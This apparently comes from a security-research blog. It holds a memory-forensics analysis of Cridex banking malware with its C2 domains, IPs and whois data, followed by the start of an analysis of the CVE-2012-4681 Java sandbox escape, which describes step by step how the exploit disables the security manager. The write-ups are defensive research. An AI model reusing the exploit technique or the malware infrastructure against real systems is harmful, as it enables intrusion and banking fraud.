<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7-le2Cm-DCKI4u-5FNxEQHr0AWY4OswWMSbWz2SXKSMRDLN-wRwxTK4hyphenhyphen3csYq6hvIlolMZ8Svb-X6P_EW-v9t1YVrw2VFo1JB37DWQl3_99aNvYftF2AvlkZpGGVgw0Rvjr_UvkbDnir/s1600/response_2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7-le2Cm-DCKI4u-5FNxEQHr0AWY4OswWMSbWz2SXKSMRDLN-wRwxTK4hyphenhyphen3csYq6hvIlolMZ8Svb-X6P_EW-v9t1YVrw2VFo1JB37DWQl3_99aNvYftF2AvlkZpGGVgw0Rvjr_UvkbDnir/s640/response_2.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">SSL Traffic indicating POST of shared objects</td></tr>
</tbody></table>
At this point, a message window popped up on the host asking if "I was sure I wanted to navigate away from this page". Selecting "Yes" took me to legitimate Google.com.<br />
<br />
<h3>
<u><span style="font-size: large;">Volatility</span></u></h3>
I suspended my infected virtual machine soon after the SSL traffic to <b><span style="color: orange;">tuningferrarisglamour.ru</span></b> appeared to pause and decided to see what some quick Volatility analysis would yield.<br />
<br />
Running <a href="http://code.google.com/p/volatility/wiki/CommandReference22#psscan">'psscan'</a> against the suspended memory image yielded the output below:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5oZkjJ80VQc-QQ2xYn73hrDROVhImCMopS9pHaxbH09lS80XKUXpWoI-Tx-aJB8OIthaB-1czNO-A1ovBK0INnnHutLVOOYeotBWSMvyPtQw1_Nnr2hQgiJqKI5ZmYW3tqgSoin-iKNP_/s1600/psscan.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="347" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5oZkjJ80VQc-QQ2xYn73hrDROVhImCMopS9pHaxbH09lS80XKUXpWoI-Tx-aJB8OIthaB-1czNO-A1ovBK0INnnHutLVOOYeotBWSMvyPtQw1_Nnr2hQgiJqKI5ZmYW3tqgSoin-iKNP_/s640/psscan.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">'psscan' output</td></tr>
</tbody></table>
<div>
Note that there are several unusual processes, notably:<br />
<br />
PID 1100 - KB00647877.exe - Terminated<br />
PID 1800 - KB00647877.exe - Terminated<br />
PID 1472 - POS4C.tmp - Terminated<br />
PID 1220 - cmd.exe - Terminated</div>
<div>
<br />
While 'cmd.exe' is not typically considered an unusual process, note the creation and exit times of this instance are identical, also the parent ID of this process is 1472, "POS4C.tmp".<br />
Examining the network connections via 'connscan', we see the following:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigomXNagXbWZP9JE1eEcYgVdKY2ISg-ElvpI__8v7H6_E1qqBt69Ilsm2WOZM_S64TsCQOnsqJP2fYZYzmg4CDEs6AKXuTlZGe80F61a-7EtI_xxGFM7-408QB3LSw_EHJDbOWxz3RJZLh/s1600/connscan.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigomXNagXbWZP9JE1eEcYgVdKY2ISg-ElvpI__8v7H6_E1qqBt69Ilsm2WOZM_S64TsCQOnsqJP2fYZYzmg4CDEs6AKXuTlZGe80F61a-7EtI_xxGFM7-408QB3LSw_EHJDbOWxz3RJZLh/s400/connscan.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Connections to remote hosts</td></tr>
</tbody></table>
<div>
Note that PID 1492, 'explorer.exe' showed an established connection to <b><span style="color: orange;">146.185.220.176</span></b>, which is what we noted earlier as being the IP address of tuningferrarisglamour.ru. PID 1492 also showed a connection to <b><span style="color: orange;">4.27.18.126</span></b>, which courtesy of Internet Systems Consortium (ISC) Passive DNS, is seen to be associated with the following domain names:<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">freestreams-cdn.alldigital.net.rncdn1.com</span><br />
<span style="font-family: Courier New, Courier, monospace;">bc01.ajnm.me.c.itmdb.net<br />
bc04.ajnm.me.c.itmdb.net<br />
bc05.ajnm.me.c.itmdb.net<br />
bc18.ajnm.me.c.itmdb.net<br />
bc19.ajnm.me.c.itmdb.net<br />
bc21.ajnm.me.c.itmdb.net<br />
blogs.aljazeera.com.c.itmdb.net<br />
l3.vip.g.xgslb.net<br />
www.nps.gov.c.footprint6.net<br />
www.usgs.gov.c.footprint6.net<br />
fp4.www.usgs.gov.c.footprint6.net</span><br />
<br />
I next dumped the VAD segments of PID 1492, 'explorer.exe' in order to examine anything associated with these domains and banking URLs. Running 'strings' on the dumped VAD segments and searching for 'tuningferrarisglamour.ru' allowed me to locate this string in "explorer.exe.2228418.0x00090000-0x0018ffff.dmp". I then ran 'strings' on that entire segment and was able to see the same banking URLS and injection scripts that I noted in the SSL stream.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5eqIivDrJey1cdbPRdHjHtna53fXgwAj1JtDYxEo8hMxh1pZBbFqvLFXnMTES1zHxw0SL4ASuwOZ7sDii4xoLigyknNsqtxMgU5vaZzqOwDuflgYuHB1Ouqdf7IkBK8y4fcDdXpYffM2-/s1600/inject.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5eqIivDrJey1cdbPRdHjHtna53fXgwAj1JtDYxEo8hMxh1pZBbFqvLFXnMTES1zHxw0SL4ASuwOZ7sDii4xoLigyknNsqtxMgU5vaZzqOwDuflgYuHB1Ouqdf7IkBK8y4fcDdXpYffM2-/s400/inject.jpg" width="282" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Strings extracted from VAD segment of 'explorer.exe'</td></tr>
</tbody></table>
<div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaDEJ9AgyVzNV6j8RllmcppGB34I8QqsnKqfkFAbpBIufKq6L5FlnqsWRR-1ok_EMuZZdbImcYGX0HM6gFjCByNw0XE_mZNLgzxhCPb019kIXVaZZulrGg5T4A_Z1_XtIobF3wvDsBvYT5/s1600/inject1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaDEJ9AgyVzNV6j8RllmcppGB34I8QqsnKqfkFAbpBIufKq6L5FlnqsWRR-1ok_EMuZZdbImcYGX0HM6gFjCByNw0XE_mZNLgzxhCPb019kIXVaZZulrGg5T4A_Z1_XtIobF3wvDsBvYT5/s400/inject1.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Strings extracted from VAD segment of 'explorer.exe'</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
It's also interesting to learn if these domains appear in any other processes. The <a href="http://code.google.com/p/volatility/wiki/CommandReferenceMal22#yarascan">'yarascan' </a>plugin is excellent for string searching when you know what you are looking for. From the Volatility command reference: <i>"This plugin can help you locate any sequence of bytes (like assembly instructions with wild cards), regular expressions, ANSI strings, or Unicode strings in user mode or kernel memory."</i><br />
<br />
Running the 'yarascan' plugin against this memory image indicates that the "<b><span style="color: orange;">droppinleverpro.ru</span></b>" domain string is also seen in PID 1056, 'svchost.exe'. I then dumped the VAD segments of this process for further analysis.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDoRB7KBdNP50sEaAFT6drCeYWKxFe8HzoPBBPYuA5xuAcQEIRXXEzfa1ON2a1quHyCKuM0jZ5yIXVpn7t96AEiO7Exv4rSD1pxUqr6g6-ruRYsDDCy0BxKKpxgQgmSg6emtC3g3F1rSsC/s1600/yara.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDoRB7KBdNP50sEaAFT6drCeYWKxFe8HzoPBBPYuA5xuAcQEIRXXEzfa1ON2a1quHyCKuM0jZ5yIXVpn7t96AEiO7Exv4rSD1pxUqr6g6-ruRYsDDCy0BxKKpxgQgmSg6emtC3g3F1rSsC/s400/yara.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">'yarascan' indicating string hit in 'svchost.exe'</td></tr>
</tbody></table>
<br />
<h3>
<span style="font-size: large;">
<u>Domains and IP addresses</u></span></h3>
There were a number of domains and IP addresses seen in this analysis. Again, courtesy of Internet Systems Consortium (ISC), trusty 'whois', and some other tools:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><b><u>ladavaz.info</u></b><br />
Domain ID:D45959608-LRMS<br />
Domain Name:LADAVAZ.INFO<br />
Created On:28-Mar-2012 20:08:39 UTC<br />
Last Updated On:27-May-2012 20:39:14 UTC<br />
Expiration Date:28-Mar-2013 20:08:39 UTC<br />
Sponsoring Registrar:GoDaddy.com LLC (R171-LRMS<br />
Name Server:NS1.EQVIA.COM<br />
Name Server:NS2.EQVIA.COM<br />
Name Server:MALINAKM.COM.UA<br />
<br />
first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-01 14:58:21 -0000<br />
last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-03 00:13:02 -0000<br />
ladavaz.info.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span><b><span style="color: orange;">192.102.6.55</span></b></span><br />
<div style="text-align: left;">
----------------------------------------</div>
<span style="font-family: Courier New, Courier, monospace;"><b><u>art-london.net</u></b><br />
Domain Name: ART-LONDON.NET<br />
Registrar: ACTIVE REGISTRAR, INC.<br />
Whois Server: whois.activeregistrar.com<br />
Referral URL: http://www.activeregistrar.com<br />
Name Server: NS1.ZIKULA-SUPPORT.COM<br />
Name Server: NS2.ZIKULA-SUPPORT.COM<br />
Status: ok<br />
Updated Date: 27-sep-2012<br />
Creation Date: 17-sep-2012<br />
Expiration Date: 17-sep-2013<br />
<br />
first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-01 13:54:08 -0000<br />
last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-01 17:34:18 -0000<br />
art-london.net.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span><b><span style="color: orange;">203.91.113.6</span></b></span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-01 17:35:22 -0000<br />
last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-01 21:48:53 -0000<br />
art-london.net.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span><b><span style="color: orange;">195.198.124.60</span></b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span>
<span style="font-family: inherit;"><b>art-london.net</b> was registered with an email address of 'windowclouse@hotmail.com'. Other domains registered with that address, and their detected activity include:</span><br />
<br />
blackiceword.com - Zeus name server<br />
compandclub.com - Zeus name server<br />
penel-opessong.com<br />
webgrafismo.net - blackhole exploit kit<br />
demedes.net - Zeus name server<br />
toppaudio.com - Zeus name server<br />
<br />
<div style="text-align: left;">
----------------------------------------</div>
<b style="font-family: 'Courier New', Courier, monospace;"><u>droppinleverpro.ru</u></b><br />
<span style="font-family: Courier New, Courier, monospace;">
domain: DROPPINLEVERPRO.RU</span><br />
<span style="font-family: Courier New, Courier, monospace;">
nserver: ns1.2ns.info.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
nserver: ns2.2ns.info.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
nserver: ns3.2ns.info.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
nserver: ns4.2ns.info.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
state: REGISTERED, DELEGATED, VERIFIED</span><br />
<span style="font-family: Courier New, Courier, monospace;">
registrar: REGRU-REG-RIPN</span><br />
<span style="font-family: Courier New, Courier, monospace;">
created: 2012.09.07</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">
first seen</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">2012-09-16 16:35:07 -0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">
last seen</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">2012-09-29 11:20:07 -0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">
droppinleverpro.ru.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">A</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">146.185.220.35</span></b><br />
<div style="text-align: left;">
<span style="font-family: inherit;">----------------------------------------</span></div>
<span style="font-family: Courier New, Courier, monospace;">
<b><u>tuningferrarisglamour.ru</u></b><br />
domain: TUNINGFERRARISGLAMOUR.RU<br />
nserver: ns1.2ns.info.<br />
nserver: ns2.2ns.info.<br />
nserver: ns3.2ns.info.<br />
nserver: ns4.2ns.info.<br />
state: REGISTERED, DELEGATED, VERIFIED<br />
registrar: REGRU-REG-RIPN<br />
created: 2012.09.29<br />
<br />
first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-09-29 15:33:13 -0000<br />
last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-02 05:56:28 -0000<br />
tuningferrarisglamour.ru.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span><b><span style="color: orange;">146.185.220.176</span></b></span><br />
<div style="text-align: left;">
----------------------------------------</div>
Also of note were domains seen in the webinject code or in the sections of the VAD segments. These domains were:<br />
<br />
<b style="font-family: 'Courier New', Courier, monospace;"><u>moogparadise.net</u></b><br />
<span style="font-family: Courier New, Courier, monospace;">
Domain Name: MOOGPARADISE.NET</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Registrar: INTERNET.BS CORP.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Whois Server: whois.internet.bs</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Referral URL: http://www.internet.bs</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Name Server: NS-CANADA.TOPDNS.COM</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Name Server: NS-UK.TOPDNS.COM</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Name Server: NS-USA.TOPDNS.COM</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Status: clientTransferProhibited</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Updated Date: 07-sep-2012</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Creation Date: 04-sep-2012</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Expiration Date: 04-sep-2013</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">
first seen</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">2012-09-10 16:41:38 -0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">
last seen</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">2012-10-02 01:31:42 -0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">
moogparadise.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">A</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">91.220.35.69</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">
moogparadise.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">NS</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">ns-uk.topdns.com.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
moogparadise.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">NS</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">ns-usa.topdns.com.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
moogparadise.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">NS</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">ns-canada.topdns.com.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
moogparadise.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">NS</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">ns1.silentdns.com.</span><br />
<div style="text-align: left;">
<span style="font-family: inherit;">----------------------------------------</span></div>
<b style="font-family: 'Courier New', Courier, monospace;"><u>compositiontantalized.net</u></b><br />
<span style="font-family: Courier New, Courier, monospace;">
Domain Name: COMPOSITIONTANTALIZED.NET</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Registrar: INTERNET.BS CORP.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Whois Server: whois.internet.bs</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Referral URL: http://www.internet.bs</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Name Server: NS1.BLACKHULK.BIZ</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Name Server: NS2.BLACKHULK.BIZ</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Status: clientTransferProhibited</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Updated Date: 14-sep-2012</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Creation Date: 14-sep-2012</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">
first seen</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">2012-10-01 16:32:22 -0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">
last seen</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">2012-10-01 21:10:23 -0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">
compositiontantalized.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">A</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">146.185.220.176</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">
compositiontantalized.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">NS</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">ns1.monkeydns.net.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
compositiontantalized.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">NS</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">ns2.monkeydns.net.</span><br />
<div style="text-align: left;">
<span style="font-family: inherit;">----------------------------------------</span></div>
<span style="font-family: Courier New, Courier, monospace;">
<b><span style="color: orange;">192.102.6.55</span></b> - HOSTVDS-NET - TOV HOST VDS - UA</span><br />
<b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">203.91.113.6</span></b><span style="font-family: 'Courier New', Courier, monospace;"> - G-Mobile - G-Mobile, Baga-Toiruu 3/9, Chingeltei district-1 - MN</span><br />
<b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">195.198.124.60</span></b><span style="font-family: 'Courier New', Courier, monospace;"> - SE-SMMIAB - Skand Meteorologi och Miljoinstr - SE</span><br />
<b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">146.185.220.35</span></b><span style="font-family: 'Courier New', Courier, monospace;"> - mdsru-net - MDS LTD - RU</span><br />
<b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">146.185.220.176</span></b><span style="font-family: 'Courier New', Courier, monospace;"> - mdsru-net -MDS LTD - RU</span><br />
<b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">91.220.35.69</span></b><span style="font-family: 'Courier New', Courier, monospace;"> - ZAMANHOST-NET - Rusnak Vasil Viktorvich - RO</span><br />
<br />
<span style="font-family: inherit;">There is much more that can be analyzed in the both the memory image and in the dropped files. Correlation of these findings with other similar spam </span>campaigns<span style="font-family: inherit;"> would also be interesting. The primary goal of this post was to examine the evolution of this banking malware, especially in light of the prolific Blackhole v2 exploit kit. For obvious reasons, I won't be posting all the webinject URLs, nor will I make the RAM dump publicly available. Notification processes are underway to the affected parties. I will provide any of the above discussed items in their entirety to qualified institutions. Feel free to email me if you want further information on anything discussed here.</span><br />
<span style="font-family: inherit;">-----------------------------------------------------------------------------------------------------------</span><br />
The following link goes to a ZIP file containing several files associated with this post.<br />
<ul>
<li>stones-instruction_think.php</li>
<li>Packet capture of infected host execution run.</li>
<li>Initial lure - croconfrm.html</li>
</ul>
<div>
A partial pack of Blackhole 2 is available for researchers for download via <a href="http://contagiodump.blogspot.com/">Contagio</a>. The pack came from a server with open directories.</div>
<div>
------------------------------------------------------------------------------------------------------------------------------</div>
<h3>
<a href="http://files.deependresearch.org/resources/cridex_ssl.zip">cridex_ssl.zip</a></h3>
<div>
<br /></div>
<br />
<span style="font-family: inherit;"><br />
</span></div>
Andre M. DiMinohttp://www.blogger.com/profile/07255414624107506662noreply@blogger.com1tag:blogger.com,1999:blog-74827929652568895.post-60902218247787832552012-08-27T12:14:00.003-04:002012-08-31T08:25:49.522-04:00CVE-2012-4681 Java 7 0-Day vulnerability analysis<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="color: #f1c232;"><b>Update Aug.30, 2012</b></span><br />
<span style="color: #f1c232;"><a href="http://www.oracle.com/technetwork/java/javase/7u7-relnotes-1835816.html" target="_blank">Oracle issued update 7 (7u7), which fixed the vulnerability</a>. </span><br />
<span style="color: #f1c232;"><br /></span>
<span style="color: #f1c232;"><b>Update: Aug. 28, 2012</b>. Rapid 7 / Metasploit <a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/multi/browser/java_jre17_exec.rb">released their module</a> and we get a lot of questions related to it from people who wish to compare. See below the original exploit source, to be run from the command line with a security manager enabled, and it will print the contents of the C:\ root directory. </span><br />
<br />
<div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM3-GIB2GIylfb2KcX-Up8253xmF_7Lh-3N78-uBFCEtVjlT029mSoJzZk64EhFDvB9fA96sq5Tvob77e5rf6WOZPvUmkMgYyfaM5apKQ2DP-MtoJBcGli2lKuXUBFo9Qhg57H8luxmsdJ/s1600/rain.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM3-GIB2GIylfb2KcX-Up8253xmF_7Lh-3N78-uBFCEtVjlT029mSoJzZk64EhFDvB9fA96sq5Tvob77e5rf6WOZPvUmkMgYyfaM5apKQ2DP-MtoJBcGli2lKuXUBFo9Qhg57H8luxmsdJ/s200/rain.png" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: xx-small;">ladyilonwick.wordpress.com</span></td></tr>
</tbody></table>
Considering that Rapid 7 posted a working exploit and addition to the exploit packs is imminent (<a href="http://krebsonsecurity.com/2012/08/attackers-pounce-on-zero-day-java-exploit/">Attackers Pounce on Zero-Day Java Exploit by Brian Krebs</a>), plus other analysis articles are being published such as <a href="http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/">New Java 0day exploited in the wild -by Alienvault</a>, we decided that witholding details of the exploit will not offer additional protection but only hinder development of protection and signatures.<br />
<br />
As we mentioned earlier, we contacted <a href="http://schierlm.users.sourceforge.net/">Michael Schierl,</a> the Java expert who discovered a number of Java vulnerabilities and asked him to have a look. He sent back his detailed analysis, exploit source, the interim patch with the source code of the patched class. <br />
<br />
<b>Update: Aug. 28, 2012. </b><br />
<b><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-4681">CVE-2012-4681</a></b><br />
Oracle Java 7 Update 6, and possibly other versions, allows remote attackers to execute arbitrary code via a crafted applet, as exploited in the wild in August 2012 using Gondzz.class and Gondvv.class.<br />
<br />
<blockquote class="tr_bq">
<b><strike>Patch request: </strike></b></blockquote>
<i><strike>At this point the patch is by request is not to preserve the code but limit it to IT administrators and developers who can test and decide if they want to deploy. We do not want to push/offer it to 3 billion end java users, it wasn't tested in all the possible scenarios and systems.</strike></i><br />
<blockquote class="tr_bq">
<ul style="text-align: left;">
<li><strike>Interim patch with the source code of the patched class. See the Readme of the patch in the previous post (thanks to Michael Schierl). </strike></li>
</ul>
<i><strike>Email from your company email address to <b><span style="color: #f6b26b;">admin <at> deependresearch.org </span></b></strike></i></blockquote>
<blockquote class="tr_bq">
<b>Additionally, you can request:</b><br />
<ul style="text-align: left;">
<li>Commented and stripped-down version of the exploit source, to be run from the command line with a security manager enabled, and it will print the contents of the C:\ root directory (thanks to Michael Schierl)</li>
</ul>
<ul style="text-align: left;">
<li>Original 0-day attack HTML page with javascript, Java applet, downloaded Poison Ivy RAT, and pcap.</li>
</ul>
<i>Email from your company email address to </i><b style="font-style: italic;"><span style="color: #f6b26b;">admin <at> deependresearch.org </span></b><i>and explain the planned use, please.</i><br />
<ul style="text-align: left;">
</ul>
</blockquote>
<br />
<br />
<b>Analysis </b><br />
<blockquote>
The Gondvv class decompiles cleanly, and that contained all the<br />
interesting parts.<br />
The real vulnerability seems to be inside the new Java7 class<br />
com.sun.beans.finder.ClassFinder,</blockquote>
<blockquote>
<a href="http://www.docjar.com/docs/api/com/sun/beans/finder/ClassFinder.html">http://www.docjar.com/docs/api/com/sun/beans/finder/ClassFinder.html</a></blockquote>
<blockquote>
which seems to make it possible for untrusted code to get access to<br />
classes in restricted packages (i. e. packages that are part of the<br />
security implementation itself and where usually untrusted code cannot<br />
get either access or call it).<br />
At the beginning, the exploit uses that ClassFinder class to get a<br />
reference to the sun.awt.SunToolkit class (sun.* is a restricted package).</blockquote>
<blockquote>
<a href="http://www.docjar.com/docs/api/sun/awt/SunToolkit.html">http://www.docjar.com/docs/api/sun/awt/SunToolkit.html</a></blockquote>
<blockquote>
<br />
The rest of the exploit is "only" using that reference to call the<br />
GetField method, which can be used to get access to private fields<br />
(which should not be a problem as the class is in a restricted package),<br />
to get access to a field that stores the permissions for running a<br />
java.beans.Statement.</blockquote>
<blockquote>
<a href="http://www.docjar.com/html/api/sun/awt/SunToolkit.java.html#301">http://www.docjar.com/html/api/sun/awt/SunToolkit.java.html#301</a></blockquote>
<blockquote>
<br />
A Statement is created that disables the security manager (by default<br />
with permissions of the untrusted code). But before calling the<br />
statement, the permissions stored in that field we just got access to<br />
are overwritten with permissions that allow running all code, and the<br />
statement can be called now and disable the security manager for us. At<br />
this point, no security manager is left, and the applet can do anything<br />
Java can.</blockquote>
<blockquote>
This method of abusing restricted package permissions is new to me (it<br />
does not work in Java 6 either as GetField was private there); but it is<br />
not unique - there are several ways you can use to get out of the<br />
sandbox if you have access to restricted packages - usually they need a<br />
bit more code though.</blockquote>
<blockquote>
What makes the code a bit more complex is the fact, that the bytecode<br />
verifier also tries to verify if you are accessing restricted packages,<br />
therefore all access to restricted packages has to be done indirectly<br />
(that is also good for obfuscation, but here needed to make the exploit<br />
